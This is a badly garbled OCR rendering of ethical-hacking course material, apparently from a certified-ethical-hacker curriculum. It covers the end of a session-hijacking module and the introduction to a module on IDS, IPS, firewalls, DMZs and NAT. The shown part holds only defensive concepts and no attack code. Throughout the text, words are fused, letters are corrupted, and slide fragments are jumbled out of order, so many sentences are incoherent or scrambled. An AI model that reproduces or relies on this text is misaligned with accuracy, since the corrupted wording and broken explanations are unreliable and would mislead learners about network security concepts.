to prevort session ijchng attemptbythrestsetors
Inthe next module,we wil dics i n deta howattackers,aswel setial hackersand
er-testes,evade
network secuty components,suchas
10S
firewalls
and to compromise
Module Summary
we discussed
In this module, conceptsrelatedto sessionhijacking,
alongwith different
typesof
session hijacking.
We also discussedi n detail application
level and network level session
hijacking this modulepresented
attacks.Furthermore, various session hijacking
tools.It also
discussed session hijacking
how to detect,protect,anddefendagainst attacks,
i n addition to
hijacking
various session detection tools. Thismoduleendedwith a detailed
and prevention
discussiono n various countermeasuresto be employed
to preventsession hijacking
attempts
bythreatactors.
In thenext module, i n detailhow attackers,
we will discuss as well as ethical
hackersandpen-
evadenetworksecurity
testers, components suchas IDSsandfirewallsto compromise network
infrastructure,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Module12:
Evading and Honeypots
Firewalls,
IDS,
Module Objectives
DS,P,Frewal, andHoneypot
Understanding Concepts
Feewal,
105,19, andHoneypot
Solutions
Bypass
diferent
Understanding Techniques
diferent
Understanding
to
Techniques
to Bypass
1s
Firewalls
1s/Frewal Tools
Evading
ferentTechniques
Understanding to DetectHoneypats
Eaton Countermeasures
1Ds/Frewal
Module Objectives
Thewidespread
i n general.
detection
use ofthe Internetthroughout
Organizations
systems(1D),
adopt
intrusion prevention systems(IPS),
world
the business hasboostednetworkusage
measures suchas firewalls,
various networksecurity
and “honeypots―
intrusion
to protecttheir
networks.Networks are the most preferred targetsof hackersfor compromising an
organization’s andattackerscontinue to findnew waysto evadenetworksecurity
security,
measures andattackthesetargets
Thismoduleprovides
deep insights technologies,
into various networksecurity suchas IDS, IPS,
firewalls,
andhoneypots. It explains
theoperations ofthesecomponents as well as the various
techniquesused by attackersto evade them. Further, it describesthe countermeasures
necessary suchattacks.
to prevent
=
of module,
At the end this
willable
Describe
to:
you
IPS,
IDS,
be
firewall,
andhoneypot
concepts
Use differentIDS, firewall,
IPS, andhoneypot
solutions
‘=
Explain
differenttechniques
to bypass
IDS
=
Explain
various
techniques
bypass
firewalls to
=
Usetools
to
evade
different
Explain
10S/firewalls
differenttechniques
to detecthoneypots
‘Adopt
countermeasures IDS/firewall
against evasion
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
IDS,IPS,Firewall,and Honeypot
Concepts
Ethical
hackersshouldhavean ideaaboutthefunction, anddesign
role,placement, of firewalls,
IPS,
IDS, and honeypots an organization's
to protect networkbyunderstanding
howan attacker
evadessuchsecurity
measures.Thissection provides
of
an overview these basic
concepts.
ical andCountermensores
Mackin ©by E-Comel
Copyright
IntrusionDetectionSystem
(IDS)
“8
detection
(ios) |
software
Anintrasion
that
isa
stem
system
or
How an IDSWorks
>
Nowa
and
hardware
dec nepets
af
‘Mlintound
outbound
network fr sspclous
the
‘utside/insie
fiewall to
tom ovtsdeiside
‘ripnating
ical andCountermensores
Mackin ©by E-Comel
Copyright
fromoutside/inside
originating the network.Whenplaced the IDSwill beideali f it is
inside,
near a DMZ; however,the best practice is to use a layered defensebydeploying one IDSi n
front
of
the the
firewallandanotherone behind firewall in the network,
Beforedeployingthe IDS,it is essentialto analyze the networktopology,understandhowthe
trafficflowsto andfromthe resources that an attackercan use to gainaccess to the network,
and identifythe criticalcomponents that will be possibletargetsof various attacksagainst
the
network.Afterthe position of the IDSi n the networkis determined, the IDSmust beconfigured
to maximize its network
protection
effect.
internet Router
a, rossiPs
ty
en (SRERB|—
User
of
1OS
Howa n IDSWorks
Figure
Intranet
12:1:Placement
tosiies
ical andCountermensores
Mackin ©by E-Comel
Copyright
IDSPreprocessor
Statetl
Protocol
of 0s
12.2:Working
Figure
Modul2 1462
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
How an IDSDetectsan Intrusion?
Signature
Recognition
alo known a s misuse detection,tis
ofa systemor network resource
to identity
events
Iedetects
in
a
theintrusion based
andcomponents computer
on thefied behavioral
sytem characteristic
users ofthe
Protocol
Anomaly
Detection
vendors of
In thistype detection,
models
deploythe TCP/IP
are bul to explore
specification
a nomalies
inthe way
in which
ical andCountermensores
Mackin ©by E-Comel
Copyright
the numberof signatures
in the database
couldresulti n the dropping
of certain
packets
New virus attacks suchas URSNIFand VIRLOCKhavedriventhe needfor multiple
for
signatures single
a attack. Changing a singlebit in some attack stringscan
invalidatea signature
generated for that attack.Therefore,entirely
new signatures
are required
Despite
to detect
the problems
asimilar
attack.
with signature-based IDS,suchsystems are popular,andthey
workwellwhenconfigured
correctly closely.
andmonitored
‘Anomaly
Detection
detection,
Anomaly detection,―
or “not-use differsfromsignature Anomaly
recognition.
detectioninvolvesa databaseof anomalies.An anomaly is detectedwhen an event
outsidethe tolerancethresholdof normaltraffic.Therefore,
‘occurs anydeviationfrom
regularuse is an attack. Anomaly detectiondetectsintrusions basedon the fixed
behavioralcharacteristicsof the users and components i n a computersystem.
Establishing
a modelof normaluse is the most challenging an anomaly
stepi n creating
detector,
©. In the traditionalmethodof anomaly detection,essentialdata are keptfor checking
variations in networktraffic. However,i n reality,
there is some unpredictability
in
network traffic,and there are too manystatisticalvariations, thus making these
modelsimprecise. Some events labeledas anomalies might onlybe irregularities
in
networkusage.
In this typeof approach,the inability
to construct a modelthoroughly on a regular
networkis a concern. Thesemodelsshouldbeusedto check networks.
specific
Anomaly
Protocol Detection
Protocolanomaly detection depends on the anomaliesspecific to a protocol. It
identifiesparticular deployment
flawsi n vendors’ of the TCP/IPprotocol.Protocolsare
designed according
to RFCspecifications,
whichdictatestandardhandshakes to permit
universalcommunication. Theprotocolanomaly
andexploits
Thereare new attackmethods
detector
can identify
thatviolateprotocol
new attacks.
standards.
Maliciousanomaly signaturesare becoming increasingly
common. Bycontrast,the
network protocolis well definedand is changing slowly.Therefore,
the signature
databaseshouldfrequently be updated to detectattacks.
Protocolanomaly
detectorsare differentfromtraditionalIDSin terms of how they
alarms
present
The bestway to presentalarmsis to explain
whichpartof the state systemis
‘compromised. must have thorough
Forthis purpose,IDSoperators knowledge
of
protocol
design.
ical andCountermensores
Mackin ©by E-Comel
Copyright
GeneralIndicationsof Intrusions
File System
Intrusions Network Intrusions System
Intrusions
T h epresnoeof nor wfonlar probeoftheauiable
Reposted Shortor incomplete
logs
= G yee
cutee
GeneralIndicationsofIntrusions
Intrusionattemptson networks, can be identifiedbyfollowing
or file systems
systems, some
general
indicators:
File System Intrusions
Byobserving systemfiles,the presenceof an intrusion can be identified.System files
recordthe activities of the system. Anymodificationor deletionof the file attributesor
the file itselfis a signthatthe systemhasbeena targetof an attack:
©. If
you find new, unknown files/programs
on your system, then there is a possibility
that the systemhas beenintrudedinto. The systemcan be compromised to the
extent
that
itcan,
turn, network
systems.
in compromise other
privileges
Whenan intrudergainsaccess to a system, he or shetries to escalate to
gain administrativeaccess. Whenthe intruder obtainsadministratorprivileges,
he/shecouldchange file permissions,for example,from read-onlyto write.
Unexplained modifications
i n file size are alsoa n indication of an attack,Make sure
you analyzeall yoursystem files.
The presence of rogue suldand sgidfiles o n your Linux systemthat do not match
your
master could
Youcan identify
an
list ofsuidandsgid
unfamiliar
files indicate attack
file namesin directories, including executablefileswith
strangeextensionsanddoubleextensions,
aprobable
filesare alsoa signof
Missing intrusion/attack
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
NetworkIntrusions
Similarly,
general
indicationsof networkintrusions include:
Asuddenincrease in bandwidthconsumption
probes
Repeated of the availableservices on your machines
Connectionrequests fromIPsother thanthosei n thenetworkrange,whichimply
user (intruder)
that an unauthenticated to connect to the network
is attempting
Repeated
login
attemptsfromremote hosts
‘A influxof logdata,
sudden whichcouldindicateattemptsat DoSattacks,
bandwidth
andDDoSattacks
consumption,
System
Intrusions
Similarly,
generalindicationsof systemintrusions include:
changes
‘Sudden i n logs
such as shortor incomplete logs
Unusually
slowsystem performance
Missing
logs
or logs or ownership
with incorrect permissions
softwareandconfiguration
Modificationsto system files
Unusualgraphic
displays
or text messages
Gaps
in systemaccounting
‘System or reboots
crashes
Unfamiliarprocesses
ical andCountermensores
Mackin ©by E-Comel
Copyright
of IntrusionDetectionSystems
Types
IntrusionDetectionSystems
[Network-Based
[© ‘edetects
malicious
activity
such
as Deniat-of
Service {incur
byhovingto
monitor
eachsystem
e vent
gag =
gag?
of IntrusionDetectionSystems
‘Types
Thereare two typesof intrusion detectionsystems:
+
IntrusionDetection Systems
Network-Based
Network-based (NIDS)
intrusion detectionsystems checkevery packet
enteringthe
networkfor the presenceof anomaliesand incorrect data. Bylimiting the firewall to
droplargenumbersof data packets, the NIDS checksevery packet thoroughly. A NIDS
andinspects
captures all traffic.It generates
alertsat the IPor application
levelbasedon
the content. NIDS are more distributedthan host-basedIDS. The NIDS identifiesthe
anomaliesat the router andhostlevels.It auditsthe informationcontainedin the data
packets and logsthe informationof maliciouspackets; furthermore, a threat
it assigns
levelto eachriskafterreceivingthe data packets.Thethreat levelenablesthe security
team to remain on alert.Thesemechanisms typicallyconsist of a blackbox placed on
thenetworkin a promiscuous mode, for patternsindicativeof an intrusion. It
listening
detectsmaliciousactivitysuchas DoSattacks,portscans,or even attemptsto breakinto
bymonitoring
computers networktraffic,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Router Firewall
Untrusted
Network
O
Management
ServerConsole
nee
12.3:Network-based
Figure
IntrusionDetectionSystems
Host-Based
10S
fF(i
(105)
‘DNS
Servers
&
=z, oes
‘Agent
Agent
Untrusted
Baga
_
Management
Centerfor
ThisMCCSAserver
CiscoSecurityAgents:
runsa CSA
agentitself
12.4:Host-bazed105(HDS)
Figure
ical andCountermensores
Mackin ©by E-Comel
Copyright
of IDSAlerts
Types
te
Positive
‘An
0S a raises an alarmwhen legitimate
attackoccurs
eeesiti
‘An
0S wien raises an alarm no attackhastakenplace
eerie
‘An
FalseNegative
0S doesnotraise an alarmwhena legitimate
attack taken
has
place 2
oes
AnIDSdoesnotaise an alarmwhenan
attack
hasnot
taken pace WK
of IDSAlerts
‘Types
‘An four typesof alerts:True Positive,
IDSgenerates FalsePositive,
FalseNegative,
andTrue
Negative.
=
TruePositive(Attack Alert):
-
A true positiveis a conditionthat occurs whenan event
an alarmandcauses the IDSto react as if a realattackis i n progress.
triggers Theevent
may be an actual attack, in which case an attacker attemptsto compromisethe
network,or it may be a drill,i n whichcase security personnel use hackertools to test a
networksegment.
FalsePositive(Noattack Alert): Afalsepositiveoccurs if an event triggers
-
a n alarm
whenn o actualattackis i n progress.It occurs whena n IDStreats regularsystemactivity
as an attack.Falsepositives tend to makeusers insensitive to alarmsandweakentheir
reactions to actual intrusion events. While testing the configurationof an IDS,
administrators usefalsepositivesto determine whethertheIDScan distinguish between
falsepositivesandrealattacks.
FalseNegative (AttackNo Alert):
-
A falsenegative is a conditionthat occurs whenan
IDSfailsto react to an actualattackevent. Thisconditionis the most dangerous failure,
as the purposeof an IDSis to detectandrespond to attacks.
ical andCountermensores
Mackin ©by E-Comel
Copyright
IntrusionPreventionSystem
(IPS)
|@Anintrason
Intusons
prevention
system(i) i
butalsopreventing
them
alsoc onsidered
a an active108sine
he
of not onlydetecting
capable
+
Block
and
Detect and
traffic
filter malicious
eliminate
quickly,
as threats itis placed
inlinei n the operational
network
+
Identify withoutgenerating
threatsaccurately falsepositives
IPStakesactions basedon certain rulesand policies
‘An configuredinto it. In other words,the
IPScan identify,
can alsobe employed
insiderthreats,
to detectcriticalissuesin corporate
maliciousnetworkguests, ete.
security of
log,and preventthe occurrence any intrusion or attacki n the network.IPS
policies suchas notorious
Classification
of IPS:
LikeIDS,
IPSare alsoclassified
into two types:
+
Host-based
IPS
Network-based
IPS
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Advantages
of IPSover IDS:
Unlike
[PS
1DS, well
as
drop
illegal
monitor in
IPScan blockas
activities
occurring
canbeusedto
single
packetsthenetwork
in a organization
=
preventthe occurrence
IPS can controlling
of direct attacksi n the network by the
of
amount networktraffic
ofanP Splacement
125: Example
Figure
ical andCountermensores
Mackin ©by E-Comel
Copyright
Firewall
(©.
ace
atthe
junction
They paced
gateway
the networks,
and'spublinetwork a
s ucha
or
Internet
between
two whichIs usallybetweenprivate network
Firewalls
examine
the
allmessages
meetthe specified
o leaving Intranetor private
entering
secutycrtera
network)
andblock thosethatdonot
Tt xcmom
Firewall
A firewall is
a software-or hardware-based systemlocatedat the network gatewaythat
protectsthe resources of a privatenetworkfromunauthorized access by users on other
networks.They are placed
networkanda public
or leaving
at the
junction
or gatewaybetweentwo networks,
networksuchasthe Internet.Firewalls
usuallyprivate
examine all the messages
the intranet andblockthosethatdo not meet the specified
security
entering
criteria, Firewalls
a
may be concernedwith the typeof traffic or with the source or destinationaddresses and
ports.They
placed
include
aset
of toolsthat monitor the flowof trafficbetweennetworks.A firewall
at the networklevelandworking
to determinewhetherto forward
closely with the router filtersall the networkpackets
themtowardtheir destinations,Always installfirewalls
away
fromthe rest of the network,so that none of the incoming requests can gaindirectaccess to a
configured,
privatenetworkresource. If appropriately thefirewallprotects on one side
systems
of A
onother
it fromsystems the
firewall is
side.
an intrusion detectionmechanism
that is designed
byan organization's
policy.
security c an change
Its settings to its functionality.
changes
to makeappropriate
Firewallsc an be configured
to restrict incoming trafficto POPandSMTPand to enable
emailaccess.Certainfirewallsblockspecific
emailservicesto avoidspam.
A firewallc an beconfigured
to check trafficata “checkpoint,―
inbound wherea security
audit is performed. It can also act as an active “phone
tap―tool for identifying an
attemptto dialinto modemsin a securednetwork.Firewalllogs
intruder’s consist of
logging informationthat notifiesthe administratoraboutall attemptsto access various
services.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Thefirewallverifiesthe incomingand outgoingtrafficagainstits rulesand acts as a
router to move databetweennetworks.Thefirewallallowsor deniesaccess requests
made
one
of
itto onother
from side
Identify
services the side.
allthe attemptsto loginto the networkfor auditing,
Unauthorized
attemptscan
be identified byembedding
an alarmthat is triggered
when an unauthorizeduser
attemptsto login, Firewallscan filter packets
basedon the addressand typeof trafic.
They as well as portnumbersduring
recognizethe source and destinationaddresses
filtering,
address and theyidentify protocol
the typesofnetworktrafficduring filtering,
Firewallsc an identify
the state andattributesof datapackets.
Secure LocalAreaNetwork
Private Public Network
12.6:Example
Figure
ail}
of Firewall
ical andCountermensores
Mackin ©by E-Comel
Copyright
FirewallArchitecture
‘Maltchomed
Firewall —
‘oon
othe
neta
baveon
the wee acy ober
Firewall Architecture
Thefirewallarchitectureconsistsof the following
elements:
Bastion Host
Thebastionhostis designedfor defendingthe networkagainstattacks.It acts as a
mediatorbetweeninsideand outsidenetworks.A bastionhostis a computer system
designed
andconfiguredto protectnetworkresources fromattacks.Trafficenteringor
leaving
the networkpasses through
thefirewall.It hastwo interfaces:
© Publicinterfacedirectly
connectedto the Internet
0. Private interfaceconnected
to the intranet,
internet
~~ Bastion
Host intranet
Figure
12.7:Bastion
HostFirewall
Screened
Subnet
A screenedsubnet(DM2)
is a protected
networkcreatedwith a two- or three-homed
firewallbehinda screeningfirewall,
and it is a term that is commonly usedto referto
the DMZ. Whenusinga three-homedfirewall, connect thefirst interfaceto the Internet,
the secondto the DMZ,and the third to the intranet, The DMZ responds to public
ical andCountermensores
Mackin ©by E-Comel
Copyright
requestsandhasno hostsaccessed
bytheprivatenetwork.Internetuserscannot access
the privatezone.
Theadvantage of screeninga subnetawayfromthe intranet is that public requests can
be respondedto without allowing traffic into the intranet. A disadvantage
of the three-
homedfirewallis that if it is compromised, boththe MZ andthe intranet couldalsobe
compromised. A safertechnique is to use multiple firewallsto separate
the Internet
to the the
fromthe DMZ, and then separate DMZfrom intranet,
Intranet
Internet +="
‘Multi-homed
Firewall
Figure
Subnet
12.8:Seeoned
Firewall
multi-homedfirewall is a node with multiple
‘A NICsthat connects to two or more
networks.It connects eachinterface to separate networksegments logicallyand
physically.
A multi-homedfirewallhelps i n increasingthe efficiency
and reliability
of an
IP network.Themultichomed firewallhasmore thanthreeinterfaces that allowfor
further subdividingthe systemsbased on the specific securityobjectives of the
However,
organization. the modelthat provides deeper is the back-to-back
protection
firewall
Intranet
Internet
12.9:Multshomed
Figure Frewal
ical andCountermensores
Mackin ©by E-Comel
Copyright
DemilitarizedZone (DMZ)
(©The
(©ean b ecreated
‘he
that
as internal
Oz iss network
using
rewall
inernaltrusted
serves butfer between
networkt he DMZnetwork,
the
andthe external
secure network
assigned
ith threeor more network interfaces,
untrosted
andtheineecure
with specie
network
Internet
rolessuchat
Network
‘onpoate
63
Demilitarized Zone(DMZ)
PRReee
In computer networks,the demilitarizedzone (DMZ) is a n area that hostscomputer(s) or a
smallsub-network placed as a neutralzone between particular
a company’s
andan untrustedexternalnetworkto preventoutsideraccessto a company’s
DMZ serves as a bufferbetween
internalnetwork
privatedata.The
the secure internalnetwork and the insecure Internet,as it
addsa layer
of security
to the corporate LAN, thuspreventing directaccessto other partsof the
network.
A DMZ is createdusinga firewallwith three or more networkinterfaces that are assigned
specificroles,
suchas an internaltrusted network,a DMZ network, or an externaluntrusted
network(Internet).Anyservice suchas email,web,or FTPthat provides accessto external
users can be placed i n the DMZ. However, web servers that communicate with database
servers cannotresidei n the DMZ,as theycouldgive outsideusers direct accessto sensitive
information.Thereare manywaysin whichthe DMZcan be configured according to specific
networktopologies andcompanyrequirements.
Netwerk
Corporate
ical andCountermensores
Mackin ©by E-Comel
Copyright
of Firewalls
Types
a =
ao
%
of Firewalls
‘Types
Thereare two typesof firewalls.
+
HardwareFirewalls
hardware
‘A firewallis a dedicated firewalldevice placed on the perimeter of the
network.It is an integral partof the networksetupand is alsobuilt into broadband
routers or usedas a standaloneproduct. A hardwarefirewall helps to protectsystems
on the localnetworkandperforms effectivelywith little or no configuration. It employs
the technique of packet filtering.
and destinationaddresses, a
It readsthe headerof packet to find out the source
and comparesthemwith a set of predefined
createdrulesthat determinewhetherit shouldforwardor dropthe packet.
and/oruser-
A hardware
firewallfunctions o n an individualsystem or a particular networkconnectedusinga
singleinterface.Examples of hardwarefirewallsincludeCiscoASAand FortiGate.
Hardwarefirewalls protectthe privatelocalarea network
However,hardwarefirewallsare expensiveas well as difficult to implement
and
upgrade.
Advantages:
© system(0S)
A hardwarefirewallwith its operating
Security: is considered
to reduce
risksandincrease the levelof security
security controls,
‘Speed:
Hardwarefirewalls
initiate fasterresponsesandenable
more traffic.
Minimalinterference:
Sincea hardwarefirewalli s aseparate
networkcomponent, it
enablesbetter management and allowsthe firewall to shut down,move, or be
reconfigured
withoutmuchinterferencei n thenetwork.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Disadvantages:
More expensivethana softwarefirewall
Difficultto implement
andconfigure.
© Consumesmore spaceandinvolvescabling.
°a =
4
rg
AL
Usually
Part @
TCP/IP
Routerof
%
PrivateLocalAreaNetwork
Secure
PrivateNetwork
PublicNetwork
Figure
12.1: Hardware
Firewall
Software Firewalls
A softwarefirewall is similarto a filter, It sits betweena regular applicationand the
networking components of the OS.It is more usefulfor individualhomeusers and itis
suitablefor mobileusers whoneeddigital security whenworking outsidethe corporate
network.Further, it is easyto install on an individual'sPC,notebook, or workgroup
server. It helps protectyour systemfromoutsideattemptsat unauthorizedaccess and
provides protectionagainsteveryday Trojans and email worms. It includesprivacy
controls, web filtering, andmore. A softwarefirewallimplants itselfi n thecriticalarea of
theapplication/network path.It analyzes thedataflowagainst the ruleset.
The configuration of softwarefirewall is simple compared to that of a hardware
firewall.A softwarefirewall intercepts all requests from a networkto the computer to
determineif theyare valid and protects the computer fromattacksandunauthorized
access. It incorporates user-definedcontrols, privacy controls,web filtering, content
filtering, etc., to restrict unsafeapplications from runningon an individualsystem,
Softwarefirewallsuse more resources thanhardwarefirewalls, whichreducesthe speed
of the system.Examples of softwarefirewallsinclude thoseproduced byNorton,
McAfee, andKaspersky.
Advantages:
> Lessexpensive thanhardware
firewalls.
© Idealforpersonal
or
home
use
ical andCountermensores
Mackin ©by E-Comel
Copyright
© Easierto configure
andreconfigure.
Disadvantages:
Consumes systemresources.
Difficultto uninstall.
forenvironments requiringfasterresponse
Not appropriate times.
Computer with
FicewallSoftware
Computer
with
FirewallSoftware
Ficewall
Software PublicNetwork
SecurePrivate
Network
Computer with PublicNetwork
FirewallSoftware
FirewallSoftware
Figure
12.12:
Software
Freval
ical andCountermensores
Mackin ©by E-Comel
Copyright
FirewallTechnologies
|© Feewals
are designed
with
the
anddeveloped helpofdiferentfewnll services
ce Fite
used
for@a
‘Technologies creatingfirewall
sets
service
ttoyernpeston
+
Filtering
Packet
Circuit-Level
Gateways
+
Application-Level
Firewall
Multilayer
Stateful
Application
Inspection
Proxies
Virtual Private Network
NetworkAddress
Translation
ical andCountermensores
Mackin ©by E-Comel
Copyright
tablebelowsummarizestechnologies
‘The at each
operating OS!layer:
OstLayer FirewallTechnology
VirtualPrivateNetwork(VPN)
Application
Application
Proxies
Presentation VirtualPrivateNetwork(VPN)
VirtualPrivateNetwork(VPN)
Session
Circuit-LevelGateways
VirtualPrivateNetwork(VPN)
Transport
Filtering
Packet
VirtualPrivateNetwork(VPN)
NetworkAddressTranslation(NAT)
Network
PacketFiltering
StatefulMultilayer
Inspection
VirtualPrivateNetwork(VPN)
DataLink
PacketFiltering
Physical =
Table
NotApplicable
1 21; Firewall
Technologies
levelsofthesetechnologies
Thesecurity vary according
to their efficiency
levels.Acomparison
of thesetechnologies
can bemadebyallowing themto passthrough the OSIlayerbetweenthe
hosts.Thedatapassesthrough layers
the intermediate from a higherlayerto a lowerlayer.
Eachlayeraddsadditionalinformationto the data packets.
Thelower layern ow sendsthe
obtainedinformationthrough the physicalnetwork to the upper layers and then to its
destination.
ical andCountermensores
Mackin ©by E-Comel
Copyright
PacketFiltering
Firewall
| Packt teringrewals
ner Form
work atthenetworkayer ofthe
O8|m odeor he internet of TEMP.They
usualy prt
In
Devending
of
pacefering frewaleachackts compared
onthepacket thectr,
an
to a
theFrewalcan
rite beforeitis forwarded
rap thepact, forward senda message tothe ornaor
ules
can
clude
theand
destination
the
source
and
destination
source
port
umber,
protocol Padres, andthe sed
Packet FilteringFirewall
In a packet
filtering
firewall,
each packet
is compared
with a set of criteria before it is
forwarded, Depending on the packetandthe criteria,the firewallcan drop the packetand
transmit it or send a messageto the originator.The rules can includethe source and the
destination the source andthedestination
IP address, portnumber, andthe protocol used.It
worksat the internet layer of the TCP/IP
modelor the networklayer of the OSImodel.Packet
filtering
firewallsfocuson individualpackets,
analyze their headerinformation, anddetermine
whichway theyneedto be directed.Traditionalpacket
filtersmakethisdecisionaccording
to
the following
informationi n a packet:
Source IP address:
information the
about whether
Usedto check
source
address
IP from
coming
aof
valid
the
thepacket
can
is
foundfromthe IPheader
source. The
packet.
packet
DestinationIP address:Checks if the is goingto the correct destinationandif the
destinationaccepts thesetypesof packets. The information about the destinationIP
addressc an foundfromthe IP headerof the packet.
SourceTCP/UDP
port:Usedto checkthe source portofthe packet
DestinationTCP/UDP portregarding
port:Usedto monitor thedestination the services
to beallowedandthe services to bedenied.
TCPflag bits:Usedto checkwhetherthe packet
hasSYN, or otherbitsset for the
ACK,
connection to bemade.
Protocolin use: Usedto checkwhetherthe protocol
that the packet
is carryingshould
beallowed,
whetherthepacket
Direction:Usedto check is entering
or
leaving
the privatenetwork.
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘=
Interface:
whether
Usedto check
packet unreliable
the
zone. froman
is coming
ss Network
Corporate
me it
Figure
of
12.13Example
PacketFitering
Firewall
Module2 1482
Page tical andCountermensores
Making by Comet
Copyright©
Circuit-LevelGateway
Firewall
Creutteve
Information
gateways
pasted
work
a gateway
atthe
sesion
toa remotecomputertroughexcutevel
layer
ofthe OS!m ode!rte ansporlayera f TEP
appears tohavergnatd fromthegateway
Ceulteve
to session
monitorrequest createsessions
gateways anddetermine thot willbeallowed
at
Creat proxyfrewals
a llowor prevent steams; theydonot itr individual
packets
opentonire
Ss Corporate
Networ
Phe
{Y=
H+ tat
twat
on
halon ate
aed eon che ene ited bend
meter
Circuit-LevelGateway Firewall
firewallworksat the session layer
A circuit-levelgateway layer
of theOSImodelor transport of
TCP/IP. It forwardsdata betweennetworks andblocksincomingpackets
without verification
from the host but allowsthe traffic to pass through itself. Informationpassedto remote
computers through a circuit-level
gatewaywill appearto haveoriginated fromthegateway,as
the incomingtraffic carries the IPaddressof the proxy (circuit-level
gateway).Suchfirewalls
to create sessions anddetermineif thosesessionswill beallowed.
monitor requests
2 Physeat
“Y=
+ towednch
2
Ti
aan
seion
bya
recogni
tne
satowea tame
o enn, nite computer
12.14
of
Crcut-Level
Gateway
Firewall
Figure Example
ical andCountermensores
Mackin ©by E-Comel
Copyright
Firewall
Application-Level
gateways
the || pron
©Appian evel
ayer
af
Sppleaton
layer
tthe aptetion gateways
asproxy
prxies)caniterpacets
OSmodel(othe
Appetontevel
FT,gopher,
tito
coniured
other tae
web
gateway
oT)
eoportel
tronsal
eee pecsucha
an
{0 teemingandoutgoing
ttc Is vsrited to services ©Aolcatontevl rane tac an itr on
ret
“Y=
H+
ttc
owed
patedomarat
halon ate
ton plato eh ts arpa eh FR orconbntns
Kpplication-Level
Firewall
Application-based
proxy firewallsfocuson the application
layerratherthan just the packets.
Application-level
gateways (proxies)
can filterpacketsat theapplication
layeroftheOSImodel
layerof TCP/IP).
(orthe application Incoming and outgoingtraffic is restrictedto services
supported
bythe proxy;allotherservice requestsare denied,Theneedforan application-level
firewall arises from the tremendousamount of voice, video, and collaborativetraffic in the
data-linklayer and networklayer, whichmaybe usedfor unauthorizedaccess to internaland
externalnetworks.Application-level gateways configuredas web proxiesprohibit
FTP,gopher,
telnet,or othertraffic. They e xamine traffic andfilter application-specific
commands suchas
post
get,
HTTP: and
packets,
inside
of
Some the featuresof application-level
firewallsare as follows:
application
They analyze
the informationto makedecisionsas to whetherto permit
traffic,
Being
proxy-based,
theycan permitor denytraffic according
to the authenticity
of the
user or processinvolved.
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
A content-caching proxy optimizesperformance by caching frequently accessed
informationratherthansending to the servers for the same old data.
new requests
Application-layer
firewallscan functioni n one of two modes:active or passive.
=
Active application-level
firewalls:They examine all incomingrequests,including
the
actualmessagethat is exchanged, suchas SQLinjection,
againstknownvulnerabilities,
parameterandcookie andcross-sitescripting.
tampering, Therequests
that are deemed
genuine
areallowedto passthrough
Passiveapplication-level
them.
firewalls:They work similarly
to IDSi n that theyalsocheckall
incomingrequests against but they
knownvulnerabilities, do not activelyrejector deny
if a potential
thoserequests attackis discovered.
Network
Internet v Corporate
*
4 ranport
internet
2atatink iy
Post
“Y=
2X baseduch
=Oletowed
ratte
tle
omser
suchas,
stowed
combinatio
on speciesapcations aa ofarto
12.5:
of Figure Example
Applcation-Leve
Firewall
ical andCountermensores
Mackin ©by E-Comel
Copyright
StatefulMultilayer Firewall
Inspection
|
aspects
Fiteriog,Circut-Levelofthe
Statefulmuttayerinspection
firewalls
combinethe otherthreetypes
Firewalls)
andAppiation-Leve!
Gateways,
offrewalls(Packet
packets the a
|G Theyfer packets for internet layerof TCF/IP,
atthenetwork layerofthe OS!m ode! to determine
whethersesion andtheyevaluate
are legitimate, thecontentsof packetstheapoiationlayer
Phe
“Y=
T cl ardatetoe
HK halon ate donsienna ec opto en
ical andCountermensores
Mackin ©by E-Comel
Copyright
poy
\Y ter layer
2
+
bed the
tric
tatowed tame
tee on wean laren
Multilayer
inspection
guce12.16:ampleof Statefl Fewall
Module2 1498
Page tical andCountermensores
Making by Comet
Copyright©
Application
Proxy
1@Anapplication
levelproxyworks
asserver
and
aprony fiters connections fr specific
anwillallow
Forexample,FTPproxywill nly
services andprotocals beblocked
FTPtrafic to pass through,
and other
all
Application
Proxy
application-level
‘An proxy
works as a proxy server andfiltersconnectionsfor specific
o n the services andprotocols
filtersconnections based
FTPproxywill onlyallowFTPtraffic to passthrough
a s a proxy.Forexample,
whenacting an
services. It
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
services reducethe loadon networklinksas they
Proxy of caching
are capable copiesof
frequently
requested dataandallow it to be directly
loadedfromthe system
insteadof
thenetwork
=
=
Proxy
systems
Proxy
perform
systemsautomatically
user-level
authentication,
as
they
are
involved
connectio in the
ical andCountermensores
Mackin ©by E-Comel
Copyright
NetworkAddressTranslation(NAT)
Networkaddresstranslationseparate P adresses
nto two sts andenables theLANto wie these
a ddresses
forintenalandexternaltrafficseparately
Ie
also
with fitering.
work
simultaneouslythethe
a route sia wopach NATl o modifies packets outer sends
to
Teastheality theadres ofthepacket
change andmake't appearthave arived frm avalid adress
firewall teringtechnique
which
Incanacta wherei t allwsonlythose whichornate onthe Inside
c onnections
andwil block
network theconnections erignateon theoutsidenetwork
NetworkAddressTranslation (NAT)
Networkaddresstranslation(NAT) IPaddresses
separates into two setsandenablesthe LANto
use theseaddresses forinternalandexternaltraffic.The NAT helps hidean internalnetwork
layoutand force connections to go through a chokepoint.It alsoworkswith a router, and
similarly
to packet filtering,
it will also
Whenthe internalmachineforwardsthe packet modify
the packets that the router sends
to the externalmachine,
simultaneously.
the NATmodifiesthe
source
of
addressthe packet
externalmachinesendsthe packet as valid
address.
When
to makeit appear if itis coming
to the internalmachine,
from a the
the NATmodifiesthe destination
The NAT can alsochange
addressto turn the visibleaddressinto the correct internaladdress.
the source anddestinationportnumbers.It limitsthe numberof public IPaddresses that an
organizationcan use. It can act as a firewall filtering
technique
whereby it allowsonlythose
connectionsthatoriginate i n the internalnetworkandblocksthe connectionsthat originate in
theexternalnetwork.
use differentschemes
NAT systems for translationbetweeninternalandexternaladdresses:
‘=
Assignone external hostaddress
foreachinternaladdress
andalways apply the same
translation.Thisslowsdownconnections anddoesnot provide
any savings i n address
space.
Dynamicallyallocatean external hostaddresswithout modifying the port numbers
whenthe internalhostinitiates a connection. Thisrestricts the numberof internalhosts
that can simultaneously access the Internet to the numberof available external
addresses.
to externally
